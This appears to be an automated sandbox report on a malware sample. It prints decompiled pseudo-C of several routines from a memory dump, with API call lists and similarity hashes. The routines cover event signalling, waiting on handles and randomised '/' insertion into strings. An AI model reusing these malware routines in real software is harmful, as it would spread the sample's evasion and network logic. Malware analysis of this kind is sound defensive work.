                                                                                                                                                                                              0x00df8ffd
                                                                                                                                                                                              0x00df8fa4
                                                                                                                                                                                              0x00df8f3d
                                                                                                                                                                                              0x00df8f45
                                                                                                                                                                                              0x00df8f5e
                                                                                                                                                                                              0x00df8f60
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00df8f60
                                                                                                                                                                                              0x00df8f51
                                                                                                                                                                                              0x00df8f55
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00df8f5b
                                                                                                                                                                                              0x00000000

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • ResetEvent.KERNEL32(?), ref: 00DF8F1E
                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 00DF8F37
                                                                                                                                                                                                • Part of subcall function 00DF9D3A: WaitForMultipleObjects.KERNEL32(00000002,00DFAA33,00000000,00DFAA33,?,?,?,00DFAA33,0000EA60), ref: 00DF9D55
                                                                                                                                                                                              • ResetEvent.KERNEL32(?), ref: 00DF8FB0
                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 00DF8FCB
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000001.00000002.613522818.0000000000DF1000.00000020.00000001.sdmp, Offset: 00DF0000, based on PE: true
                                                                                                                                                                                              • Associated: 00000001.00000002.613479500.0000000000DF0000.00000004.00000001.sdmp Download File
                                                                                                                                                                                              • Associated: 00000001.00000002.613600445.0000000000DFC000.00000002.00000001.sdmp Download File
                                                                                                                                                                                              • Associated: 00000001.00000002.613625403.0000000000DFD000.00000004.00000001.sdmp Download File
                                                                                                                                                                                              • Associated: 00000001.00000002.613644005.0000000000DFF000.00000002.00000001.sdmp Download File
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ErrorEventLastReset$MultipleObjectsWait
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 2394032930-0
                                                                                                                                                                                              • Opcode ID: da8b7b58e75d7937bf8bb3609874982954e3a9963cf5bd4d915fb313dea90f4a
                                                                                                                                                                                              • Instruction ID: d03d879181ac18f4369f1a7e2948c5f0033457d6e22e93450bfc8f278507cb3c
                                                                                                                                                                                              • Opcode Fuzzy Hash: da8b7b58e75d7937bf8bb3609874982954e3a9963cf5bd4d915fb313dea90f4a
                                                                                                                                                                                              • Instruction Fuzzy Hash: 9A318632A00608AFCB219BA4CC54F7EB7BAEF88350F1A8514E655D7190DF70D9859730
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              C-Code - Quality: 87%
                                                                                                                                                                                              			E00DF72F2(signed int _a4, signed int* _a8) {
                                                                                                                                                                                              				void* __ecx;
                                                                                                                                                                                              				void* __edi;
                                                                                                                                                                                              				signed int _t6;
                                                                                                                                                                                              				intOrPtr _t8;
                                                                                                                                                                                              				intOrPtr _t12;
                                                                                                                                                                                              				short* _t19;
                                                                                                                                                                                              				void* _t25;
                                                                                                                                                                                              				signed int* _t28;
                                                                                                                                                                                              				CHAR* _t30;
                                                                                                                                                                                              				long _t31;
                                                                                                                                                                                              				intOrPtr* _t32;
                                                                                                                                                                                              
                                                                                                                                                                                              				_t6 =  *0xdfd270; // 0xd448b889
                                                                                                                                                                                              				_t32 = _a4;
                                                                                                                                                                                              				_a4 = _t6 ^ 0x109a6410;
                                                                                                                                                                                              				_t8 =  *0xdfd2a4; // 0x3e0a5a8
                                                                                                                                                                                              				_t3 = _t8 + 0xdfe836; // 0x61636f4c
                                                                                                                                                                                              				_t25 = 0;
                                                                                                                                                                                              				_t30 = E00DF6AF7(_t3, 1);
                                                                                                                                                                                              				if(_t30 != 0) {
                                                                                                                                                                                              					_t25 = CreateEventA(0xdfd2a8, 1, 0, _t30);
                                                                                                                                                                                              					E00DF147E(_t30);
                                                                                                                                                                                              				}
                                                                                                                                                                                              				_t12 =  *0xdfd25c; // 0x4000000a
                                                                                                                                                                                              				if(_t12 <= 5 || _t12 == 6 && _t12 >= 2 ||  *_t32 == 0 || E00DF56A2() != 0) {
                                                                                                                                                                                              					L12:
                                                                                                                                                                                              					_t28 = _a8;
                                                                                                                                                                                              					if(_t28 != 0) {
                                                                                                                                                                                              						 *_t28 =  *_t28 | 0x00000001;
                                                                                                                                                                                              					}
                                                                                                                                                                                              					_t31 = E00DF1493(_t32, 0);
                                                                                                                                                                                              					if(_t31 == 0 && _t25 != 0) {
                                                                                                                                                                                              						_t31 = WaitForSingleObject(_t25, 0x4e20);
                                                                                                                                                                                              					}
                                                                                                                                                                                              					if(_t28 != 0 && _t31 != 0) {
                                                                                                                                                                                              						 *_t28 =  *_t28 & 0xfffffffe;
                                                                                                                                                                                              					}
                                                                                                                                                                                              					goto L20;
                                                                                                                                                                                              				} else {
                                                                                                                                                                                              					_t19 =  *0xdfd110( *_t32, 0x20);
                                                                                                                                                                                              					if(_t19 != 0) {
                                                                                                                                                                                              						 *_t19 = 0;
                                                                                                                                                                                              						_t19 = _t19 + 2;
                                                                                                                                                                                              					}
                                                                                                                                                                                              					_t31 = E00DF7827(0,  *_t32, _t19, 0);
                                                                                                                                                                                              					if(_t31 == 0) {
                                                                                                                                                                                              						if(_t25 == 0) {
                                                                                                                                                                                              							L22:
                                                                                                                                                                                              							return _t31;
                                                                                                                                                                                              						}
                                                                                                                                                                                              						_t31 = WaitForSingleObject(_t25, 0x4e20);
                                                                                                                                                                                              						if(_t31 == 0) {
                                                                                                                                                                                              							L20:
                                                                                                                                                                                              							if(_t25 != 0) {
                                                                                                                                                                                              								CloseHandle(_t25);
                                                                                                                                                                                              							}
                                                                                                                                                                                              							goto L22;
                                                                                                                                                                                              						}
                                                                                                                                                                                              					}
                                                                                                                                                                                              					goto L12;
                                                                                                                                                                                              				}
                                                                                                                                                                                              			}














                                                                                                                                                                                              0x00df72f3
                                                                                                                                                                                              0x00df72fa
                                                                                                                                                                                              0x00df7304
                                                                                                                                                                                              0x00df7308
                                                                                                                                                                                              0x00df730e
                                                                                                                                                                                              0x00df731d
                                                                                                                                                                                              0x00df7324
                                                                                                                                                                                              0x00df7328
                                                                                                                                                                                              0x00df733a
                                                                                                                                                                                              0x00df733c
                                                                                                                                                                                              0x00df733c
                                                                                                                                                                                              0x00df7341
                                                                                                                                                                                              0x00df7348
                                                                                                                                                                                              0x00df739f
                                                                                                                                                                                              0x00df739f
                                                                                                                                                                                              0x00df73a5
                                                                                                                                                                                              0x00df73a7
                                                                                                                                                                                              0x00df73a7
                                                                                                                                                                                              0x00df73b1
                                                                                                                                                                                              0x00df73b5
                                                                                                                                                                                              0x00df73c7
                                                                                                                                                                                              0x00df73c7
                                                                                                                                                                                              0x00df73cb
                                                                                                                                                                                              0x00df73d1
                                                                                                                                                                                              0x00df73d1
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00df7361
                                                                                                                                                                                              0x00df7366
                                                                                                                                                                                              0x00df736e
                                                                                                                                                                                              0x00df7372
                                                                                                                                                                                              0x00df7376
                                                                                                                                                                                              0x00df7376
                                                                                                                                                                                              0x00df7383
                                                                                                                                                                                              0x00df7387
                                                                                                                                                                                              0x00df738b
                                                                                                                                                                                              0x00df73e0
                                                                                                                                                                                              0x00df73e6
                                                                                                                                                                                              0x00df73e6
                                                                                                                                                                                              0x00df7399
                                                                                                                                                                                              0x00df739d
                                                                                                                                                                                              0x00df73d4
                                                                                                                                                                                              0x00df73d6
                                                                                                                                                                                              0x00df73d9
                                                                                                                                                                                              0x00df73d9
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00df73d6
                                                                                                                                                                                              0x00df739d
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00df7387

                                                                                                                                                                                              APIs
                                                                                                                                                                                                • Part of subcall function 00DF6AF7: lstrlen.KERNEL32(?,00000000,00000000,00000027,00000005,00000000,00000000,00DF2098,74666F53,00000000,?,00DFD00C,?,?), ref: 00DF6B2D
                                                                                                                                                                                                • Part of subcall function 00DF6AF7: lstrcpy.KERNEL32(00000000,00000000), ref: 00DF6B51
                                                                                                                                                                                                • Part of subcall function 00DF6AF7: lstrcat.KERNEL32(00000000,00000000), ref: 00DF6B59
                                                                                                                                                                                              • CreateEventA.KERNEL32(00DFD2A8,00000001,00000000,00000000,61636F4C,00000001,00000000,?,?,00000000,?,00DF555B,?,?,?), ref: 00DF7333
                                                                                                                                                                                                • Part of subcall function 00DF147E: HeapFree.KERNEL32(00000000,00000000,00DF1D11,00000000,?,?,-00000008), ref: 00DF148A
                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(00000000,00004E20,00DF555B,00000000,00000000,?,00000000,?,00DF555B,?,?,?), ref: 00DF7393
                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(00000000,00004E20,61636F4C,00000001,00000000,?,?,00000000,?,00DF555B,?,?,?), ref: 00DF73C1
                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,61636F4C,00000001,00000000,?,?,00000000,?,00DF555B,?,?,?), ref: 00DF73D9
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000001.00000002.613522818.0000000000DF1000.00000020.00000001.sdmp, Offset: 00DF0000, based on PE: true
                                                                                                                                                                                              • Associated: 00000001.00000002.613479500.0000000000DF0000.00000004.00000001.sdmp Download File
                                                                                                                                                                                              • Associated: 00000001.00000002.613600445.0000000000DFC000.00000002.00000001.sdmp Download File
                                                                                                                                                                                              • Associated: 00000001.00000002.613625403.0000000000DFD000.00000004.00000001.sdmp Download File
                                                                                                                                                                                              • Associated: 00000001.00000002.613644005.0000000000DFF000.00000002.00000001.sdmp Download File
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ObjectSingleWait$CloseCreateEventFreeHandleHeaplstrcatlstrcpylstrlen
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 73268831-0
                                                                                                                                                                                              • Opcode ID: d52c989bba07bfa3bace8f77ea39d81a6e559c2733e2a99af990d7fbf011025a
                                                                                                                                                                                              • Instruction ID: f1ca98fae32063b2dde0856c80497f82c12acbd8324d3a19e4f4194b5fb55d35
                                                                                                                                                                                              • Opcode Fuzzy Hash: d52c989bba07bfa3bace8f77ea39d81a6e559c2733e2a99af990d7fbf011025a
                                                                                                                                                                                              • Instruction Fuzzy Hash: BA21D73260435EBBC7315B689C44ABA73EAEB84714B0BC615FF61DA254DB71CC01D6B4
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              C-Code - Quality: 38%
                                                                                                                                                                                              			E00DFA1F1(void* __ecx, void* __esi) {
                                                                                                                                                                                              				char _v8;
                                                                                                                                                                                              				long _v12;
                                                                                                                                                                                              				char _v16;
                                                                                                                                                                                              				long _v20;
                                                                                                                                                                                              				long _t34;
                                                                                                                                                                                              				long _t39;
                                                                                                                                                                                              				long _t42;
                                                                                                                                                                                              				long _t56;
                                                                                                                                                                                              				intOrPtr _t58;
                                                                                                                                                                                              				void* _t59;
                                                                                                                                                                                              				intOrPtr* _t60;
                                                                                                                                                                                              				void* _t61;
                                                                                                                                                                                              
                                                                                                                                                                                              				_t61 = __esi;
                                                                                                                                                                                              				_t59 = __ecx;
                                                                                                                                                                                              				_t60 =  *0xdfd140; // 0xdfad41
                                                                                                                                                                                              				 *((intOrPtr*)(__esi + 0x2c)) = 0;
                                                                                                                                                                                              				do {
                                                                                                                                                                                              					_t34 = WaitForSingleObject( *(_t61 + 0x1c), 0);
                                                                                                                                                                                              					_v20 = _t34;
                                                                                                                                                                                              					if(_t34 != 0) {
                                                                                                                                                                                              						L3:
                                                                                                                                                                                              						_push( &_v16);
                                                                                                                                                                                              						_push( &_v8);
                                                                                                                                                                                              						_push(_t61 + 0x2c);
                                                                                                                                                                                              						_push(0x20000013);
                                                                                                                                                                                              						_push( *((intOrPtr*)(_t61 + 0x18)));
                                                                                                                                                                                              						_v8 = 4;
                                                                                                                                                                                              						_v16 = 0;
                                                                                                                                                                                              						if( *_t60() == 0) {
                                                                                                                                                                                              							_t39 = GetLastError();
                                                                                                                                                                                              							_v12 = _t39;
                                                                                                                                                                                              							if(_v20 == 0 || _t39 != 0x2ef3) {
                                                                                                                                                                                              								L15:
                                                                                                                                                                                              								return _v12;
                                                                                                                                                                                              							} else {
                                                                                                                                                                                              								goto L11;
                                                                                                                                                                                              							}
                                                                                                                                                                                              						}
                                                                                                                                                                                              						if(_v8 != 4 ||  *((intOrPtr*)(_t61 + 0x2c)) == 0) {
                                                                                                                                                                                              							goto L11;
                                                                                                                                                                                              						} else {
                                                                                                                                                                                              							_v16 = 0;
                                                                                                                                                                                              							_v8 = 0;
                                                                                                                                                                                              							 *_t60( *((intOrPtr*)(_t61 + 0x18)), 0x16, 0,  &_v8,  &_v16);
                                                                                                                                                                                              							_t58 = E00DF58BE(_v8 + 1);
                                                                                                                                                                                              							if(_t58 == 0) {
                                                                                                                                                                                              								_v12 = 8;
                                                                                                                                                                                              							} else {
                                                                                                                                                                                              								_push( &_v16);
                                                                                                                                                                                              								_push( &_v8);
                                                                                                                                                                                              								_push(_t58);
                                                                                                                                                                                              								_push(0x16);
                                                                                                                                                                                              								_push( *((intOrPtr*)(_t61 + 0x18)));
                                                                                                                                                                                              								if( *_t60() == 0) {
                                                                                                                                                                                              									E00DF147E(_t58);
                                                                                                                                                                                              									_v12 = GetLastError();
                                                                                                                                                                                              								} else {
                                                                                                                                                                                              									 *((char*)(_t58 + _v8)) = 0;
                                                                                                                                                                                              									 *((intOrPtr*)(_t61 + 0xc)) = _t58;
                                                                                                                                                                                              								}
                                                                                                                                                                                              							}
                                                                                                                                                                                              							goto L15;
                                                                                                                                                                                              						}
                                                                                                                                                                                              					}
                                                                                                                                                                                              					SetEvent( *(_t61 + 0x1c));
                                                                                                                                                                                              					_t56 =  *((intOrPtr*)(_t61 + 0x28));
                                                                                                                                                                                              					_v12 = _t56;
                                                                                                                                                                                              					if(_t56 != 0) {
                                                                                                                                                                                              						goto L15;
                                                                                                                                                                                              					}
                                                                                                                                                                                              					goto L3;
                                                                                                                                                                                              					L11:
                                                                                                                                                                                              					_t42 = E00DF9D3A( *(_t61 + 0x1c), _t59, 0xea60);
                                                                                                                                                                                              					_v12 = _t42;
                                                                                                                                                                                              				} while (_t42 == 0);
                                                                                                                                                                                              				goto L15;
                                                                                                                                                                                              			}















                                                                                                                                                                                              0x00dfa1f1
                                                                                                                                                                                              0x00dfa1f1
                                                                                                                                                                                              0x00dfa1fb
                                                                                                                                                                                              0x00dfa201
                                                                                                                                                                                              0x00dfa204
                                                                                                                                                                                              0x00dfa208
                                                                                                                                                                                              0x00dfa20e
                                                                                                                                                                                              0x00dfa213
                                                                                                                                                                                              0x00dfa22c
                                                                                                                                                                                              0x00dfa22f
                                                                                                                                                                                              0x00dfa233
                                                                                                                                                                                              0x00dfa237
                                                                                                                                                                                              0x00dfa238
                                                                                                                                                                                              0x00dfa23d
                                                                                                                                                                                              0x00dfa240
                                                                                                                                                                                              0x00dfa247
                                                                                                                                                                                              0x00dfa24e
                                                                                                                                                                                              0x00dfa2a1
                                                                                                                                                                                              0x00dfa2a7
                                                                                                                                                                                              0x00dfa2ad
                                                                                                                                                                                              0x00dfa2e8
                                                                                                                                                                                              0x00dfa2ee
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00dfa2ad
                                                                                                                                                                                              0x00dfa254
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00dfa25b
                                                                                                                                                                                              0x00dfa269
                                                                                                                                                                                              0x00dfa26c
                                                                                                                                                                                              0x00dfa26f
                                                                                                                                                                                              0x00dfa27b
                                                                                                                                                                                              0x00dfa27f
                                                                                                                                                                                              0x00dfa2e1
                                                                                                                                                                                              0x00dfa281
                                                                                                                                                                                              0x00dfa284
                                                                                                                                                                                              0x00dfa288
                                                                                                                                                                                              0x00dfa289
                                                                                                                                                                                              0x00dfa28a
                                                                                                                                                                                              0x00dfa28c
                                                                                                                                                                                              0x00dfa293
                                                                                                                                                                                              0x00dfa2d1
                                                                                                                                                                                              0x00dfa2dc
                                                                                                                                                                                              0x00dfa295
                                                                                                                                                                                              0x00dfa298
                                                                                                                                                                                              0x00dfa29c
                                                                                                                                                                                              0x00dfa29c
                                                                                                                                                                                              0x00dfa293
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00dfa27f
                                                                                                                                                                                              0x00dfa254
                                                                                                                                                                                              0x00dfa218
                                                                                                                                                                                              0x00dfa21e
                                                                                                                                                                                              0x00dfa221
                                                                                                                                                                                              0x00dfa226
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00dfa2b6
                                                                                                                                                                                              0x00dfa2be
                                                                                                                                                                                              0x00dfa2c3
                                                                                                                                                                                              0x00dfa2c6
                                                                                                                                                                                              0x00000000

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(?,00000000,00000000,00000102,?,00000000,00000000,74B481D0), ref: 00DFA208
                                                                                                                                                                                              • SetEvent.KERNEL32(?), ref: 00DFA218
                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 00DFA2A1
                                                                                                                                                                                                • Part of subcall function 00DF9D3A: WaitForMultipleObjects.KERNEL32(00000002,00DFAA33,00000000,00DFAA33,?,?,?,00DFAA33,0000EA60), ref: 00DF9D55
                                                                                                                                                                                                • Part of subcall function 00DF147E: HeapFree.KERNEL32(00000000,00000000,00DF1D11,00000000,?,?,-00000008), ref: 00DF148A
                                                                                                                                                                                              • GetLastError.KERNEL32(00000000), ref: 00DFA2D6
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000001.00000002.613522818.0000000000DF1000.00000020.00000001.sdmp, Offset: 00DF0000, based on PE: true
                                                                                                                                                                                              • Associated: 00000001.00000002.613479500.0000000000DF0000.00000004.00000001.sdmp Download File
                                                                                                                                                                                              • Associated: 00000001.00000002.613600445.0000000000DFC000.00000002.00000001.sdmp Download File
                                                                                                                                                                                              • Associated: 00000001.00000002.613625403.0000000000DFD000.00000004.00000001.sdmp Download File
                                                                                                                                                                                              • Associated: 00000001.00000002.613644005.0000000000DFF000.00000002.00000001.sdmp Download File
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ErrorLastWait$EventFreeHeapMultipleObjectObjectsSingle
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 602384898-0
                                                                                                                                                                                              • Opcode ID: 79ed2c4803fae41c912c48ed3b7d9df6fb0861ef1c8e8b4b51fc628e2808cccf
                                                                                                                                                                                              • Instruction ID: 77421f06d7fc2b982884a25cc8782541c8a7b2e02c833527b9f20eaee506977b
                                                                                                                                                                                              • Opcode Fuzzy Hash: 79ed2c4803fae41c912c48ed3b7d9df6fb0861ef1c8e8b4b51fc628e2808cccf
                                                                                                                                                                                              • Instruction Fuzzy Hash: 093121B5A0030CEFDB20DFA5C8C09AEB7B8EB04300F15D96AE646E2251D631AE45DB75
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              C-Code - Quality: 39%
                                                                                                                                                                                              			E00DF54AC(void* __ecx, void* __eflags, intOrPtr _a4, signed int* _a8, intOrPtr _a12) {
                                                                                                                                                                                              				intOrPtr _v12;
                                                                                                                                                                                              				void* _v16;
                                                                                                                                                                                              				void* _v28;
                                                                                                                                                                                              				char _v32;
                                                                                                                                                                                              				void* __esi;
                                                                                                                                                                                              				void* _t29;
                                                                                                                                                                                              				void* _t38;
                                                                                                                                                                                              				signed int* _t39;
                                                                                                                                                                                              				void* _t40;
                                                                                                                                                                                              
                                                                                                                                                                                              				_t36 = __ecx;
                                                                                                                                                                                              				_v32 = 0;
                                                                                                                                                                                              				asm("stosd");
                                                                                                                                                                                              				asm("stosd");
                                                                                                                                                                                              				asm("stosd");
                                                                                                                                                                                              				asm("stosd");
                                                                                                                                                                                              				asm("stosd");
                                                                                                                                                                                              				_v12 = _a4;
                                                                                                                                                                                              				_t38 = E00DF4F1F(__ecx,  &_v32);
                                                                                                                                                                                              				if(_t38 != 0) {
                                                                                                                                                                                              					L12:
                                                                                                                                                                                              					_t39 = _a8;
                                                                                                                                                                                              					L13:
                                                                                                                                                                                              					if(_t39 != 0 && ( *_t39 & 0x00000001) == 0) {
                                                                                                                                                                                              						_t23 =  &(_t39[1]);
                                                                                                                                                                                              						if(_t39[1] != 0) {
                                                                                                                                                                                              							E00DF5749(_t23);
                                                                                                                                                                                              						}
                                                                                                                                                                                              					}
                                                                                                                                                                                              					return _t38;
                                                                                                                                                                                              				}
                                                                                                                                                                                              				if(E00DF9138(0x40,  &_v16) != 0) {
                                                                                                                                                                                              					_v16 = 0;
                                                                                                                                                                                              				}
                                                                                                                                                                                              				_t40 = CreateEventA(0xdfd2a8, 1, 0,  *0xdfd340);
                                                                                                                                                                                              				if(_t40 != 0) {
                                                                                                                                                                                              					SetEvent(_t40);
                                                                                                                                                                                              					Sleep(0xbb8);
                                                                                                                                                                                              					CloseHandle(_t40);
                                                                                                                                                                                              				}
                                                                                                                                                                                              				_push( &_v32);
                                                                                                                                                                                              				if(_a12 == 0) {
                                                                                                                                                                                              					_t29 = E00DF9575(_t36);
                                                                                                                                                                                              				} else {
                                                                                                                                                                                              					_push(0);
                                                                                                                                                                                              					_push(0);
                                                                                                                                                                                              					_push(0);
                                                                                                                                                                                              					_push(0);
                                                                                                                                                                                              					_push(0);
                                                                                                                                                                                              					_t29 = E00DFA642(_t36);
                                                                                                                                                                                              				}
                                                                                                                                                                                              				_t41 = _v16;
                                                                                                                                                                                              				_t38 = _t29;
                                                                                                                                                                                              				if(_v16 != 0) {
                                                                                                                                                                                              					E00DF568A(_t41);
                                                                                                                                                                                              				}
                                                                                                                                                                                              				if(_t38 != 0) {
                                                                                                                                                                                              					goto L12;
                                                                                                                                                                                              				} else {
                                                                                                                                                                                              					_t39 = _a8;
                                                                                                                                                                                              					_t38 = E00DF72F2( &_v32, _t39);
                                                                                                                                                                                              					goto L13;
                                                                                                                                                                                              				}
                                                                                                                                                                                              			}












                                                                                                                                                                                              0x00df54ac
                                                                                                                                                                                              0x00df54b9
                                                                                                                                                                                              0x00df54bf
                                                                                                                                                                                              0x00df54c0
                                                                                                                                                                                              0x00df54c1
                                                                                                                                                                                              0x00df54c2
                                                                                                                                                                                              0x00df54c3
                                                                                                                                                                                              0x00df54c7
                                                                                                                                                                                              0x00df54d3
                                                                                                                                                                                              0x00df54d7
                                                                                                                                                                                              0x00df555f
                                                                                                                                                                                              0x00df555f
                                                                                                                                                                                              0x00df5562
                                                                                                                                                                                              0x00df5564
                                                                                                                                                                                              0x00df556c
                                                                                                                                                                                              0x00df5572
                                                                                                                                                                                              0x00df5575
                                                                                                                                                                                              0x00df5575
                                                                                                                                                                                              0x00df5572
                                                                                                                                                                                              0x00df5580
                                                                                                                                                                                              0x00df5580
                                                                                                                                                                                              0x00df54ea
                                                                                                                                                                                              0x00df54ec
                                                                                                                                                                                              0x00df54ec
                                                                                                                                                                                              0x00df5503
                                                                                                                                                                                              0x00df5507
                                                                                                                                                                                              0x00df550a
                                                                                                                                                                                              0x00df5515
                                                                                                                                                                                              0x00df551c
                                                                                                                                                                                              0x00df551c
                                                                                                                                                                                              0x00df5525
                                                                                                                                                                                              0x00df5529
                                                                                                                                                                                              0x00df5537
                                                                                                                                                                                              0x00df552b
                                                                                                                                                                                              0x00df552b
                                                                                                                                                                                              0x00df552c
                                                                                                                                                                                              0x00df552d
                                                                                                                                                                                              0x00df552e
                                                                                                                                                                                              0x00df552f
                                                                                                                                                                                              0x00df5530
                                                                                                                                                                                              0x00df5530
                                                                                                                                                                                              0x00df553c
                                                                                                                                                                                              0x00df553f
                                                                                                                                                                                              0x00df5543
                                                                                                                                                                                              0x00df5545
                                                                                                                                                                                              0x00df5545
                                                                                                                                                                                              0x00df554c
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00df554e
                                                                                                                                                                                              0x00df554e
                                                                                                                                                                                              0x00df555b
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00df555b

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • CreateEventA.KERNEL32(00DFD2A8,00000001,00000000,00000040,?,?,74B5F710,00000000,74B5F730), ref: 00DF54FD
                                                                                                                                                                                              • SetEvent.KERNEL32(00000000), ref: 00DF550A
                                                                                                                                                                                              • Sleep.KERNEL32(00000BB8), ref: 00DF5515
                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00DF551C
                                                                                                                                                                                                • Part of subcall function 00DF9575: WaitForSingleObject.KERNEL32(00000000,?,?,?,00DF553C,?,00DF553C,?,?,?,?,?,00DF553C,?), ref: 00DF964F
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000001.00000002.613522818.0000000000DF1000.00000020.00000001.sdmp, Offset: 00DF0000, based on PE: true
                                                                                                                                                                                              • Associated: 00000001.00000002.613479500.0000000000DF0000.00000004.00000001.sdmp Download File
                                                                                                                                                                                              • Associated: 00000001.00000002.613600445.0000000000DFC000.00000002.00000001.sdmp Download File
                                                                                                                                                                                              • Associated: 00000001.00000002.613625403.0000000000DFD000.00000004.00000001.sdmp Download File
                                                                                                                                                                                              • Associated: 00000001.00000002.613644005.0000000000DFF000.00000002.00000001.sdmp Download File
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Event$CloseCreateHandleObjectSingleSleepWait
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 2559942907-0
                                                                                                                                                                                              • Opcode ID: ca638f3ad934383865de4000abef35f17258f57b90d10b50cdb7553302ae7521
                                                                                                                                                                                              • Instruction ID: 54ce6e54c57585f12ae73c8343b87bf4627e5ba25f169509a218813cb308ceac
                                                                                                                                                                                              • Opcode Fuzzy Hash: ca638f3ad934383865de4000abef35f17258f57b90d10b50cdb7553302ae7521
                                                                                                                                                                                              • Instruction Fuzzy Hash: 1B212772D0061DEBCB10AFE4E8859BE776AEF44351B06C425FB52E7204D674DA418B71
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              C-Code - Quality: 68%
                                                                                                                                                                                              			E00DF4858(unsigned int __eax, void* __ecx) {
                                                                                                                                                                                              				void* _v8;
                                                                                                                                                                                              				void* _v12;
                                                                                                                                                                                              				signed int _t21;
                                                                                                                                                                                              				signed short _t23;
                                                                                                                                                                                              				char* _t27;
                                                                                                                                                                                              				void* _t29;
                                                                                                                                                                                              				void* _t30;
                                                                                                                                                                                              				unsigned int _t33;
                                                                                                                                                                                              				void* _t37;
                                                                                                                                                                                              				unsigned int _t38;
                                                                                                                                                                                              				void* _t41;
                                                                                                                                                                                              				void* _t42;
                                                                                                                                                                                              				int _t45;
                                                                                                                                                                                              				void* _t46;
                                                                                                                                                                                              
                                                                                                                                                                                              				_t42 = __eax;
                                                                                                                                                                                              				__imp__(__eax, _t37, _t41, _t29, __ecx, __ecx);
                                                                                                                                                                                              				_t38 = __eax;
                                                                                                                                                                                              				_t30 = RtlAllocateHeap( *0xdfd238, 0, (__eax >> 3) + __eax + 1);
                                                                                                                                                                                              				_v12 = _t30;
                                                                                                                                                                                              				if(_t30 != 0) {
                                                                                                                                                                                              					_v8 = _t42;
                                                                                                                                                                                              					do {
                                                                                                                                                                                              						_t33 = 0x18;
                                                                                                                                                                                              						if(_t38 <= _t33) {
                                                                                                                                                                                              							_t33 = _t38;
                                                                                                                                                                                              						}
                                                                                                                                                                                              						_t21 =  *0xdfd250; // 0x71fd4899
                                                                                                                                                                                              						_t23 = 0x3c6ef35f + _t21 * 0x19660d;
                                                                                                                                                                                              						 *0xdfd250 = _t23;
                                                                                                                                                                                              						_t45 = (_t23 & 0x0000ffff) % (_t33 + 0xfffffff8) + 8;
                                                                                                                                                                                              						memcpy(_t30, _v8, _t45);
                                                                                                                                                                                              						_v8 = _v8 + _t45;
                                                                                                                                                                                              						_t27 = _t30 + _t45;
                                                                                                                                                                                              						_t38 = _t38 - _t45;
                                                                                                                                                                                              						_t46 = _t46 + 0xc;
                                                                                                                                                                                              						 *_t27 = 0x2f;
                                                                                                                                                                                              						_t13 = _t27 + 1; // 0x1
                                                                                                                                                                                              						_t30 = _t13;
                                                                                                                                                                                              					} while (_t38 > 8);
                                                                                                                                                                                              					memcpy(_t30, _v8, _t38 + 1);
                                                                                                                                                                                              				}
                                                                                                                                                                                              				return _v12;
                                                                                                                                                                                              			}

















                                                                                                                                                                                              0x00df4860
                                                                                                                                                                                              0x00df4863
                                                                                                                                                                                              0x00df4869
                                                                                                                                                                                              0x00df4881
                                                                                                                                                                                              0x00df4883
                                                                                                                                                                                              0x00df4888
                                                                                                                                                                                              0x00df488a
                                                                                                                                                                                              0x00df488d
                                                                                                                                                                                              0x00df488f
                                                                                                                                                                                              0x00df4892
                                                                                                                                                                                              0x00df4894
                                                                                                                                                                                              0x00df4894
                                                                                                                                                                                              0x00df4896
                                                                                                                                                                                              0x00df48a1
                                                                                                                                                                                              0x00df48a6
                                                                                                                                                                                              0x00df48b7
                                                                                                                                                                                              0x00df48bf
                                                                                                                                                                                              0x00df48c4
                                                                                                                                                                                              0x00df48c7
                                                                                                                                                                                              0x00df48ca
                                                                                                                                                                                              0x00df48cc
                                                                                                                                                                                              0x00df48cf
                                                                                                                                                                                              0x00df48d2
                                                                                                                                                                                              0x00df48d2
                                                                                                                                                                                              0x00df48d5
                                                                                                                                                                                              0x00df48e0
                                                                                                                                                                                              0x00df48e5
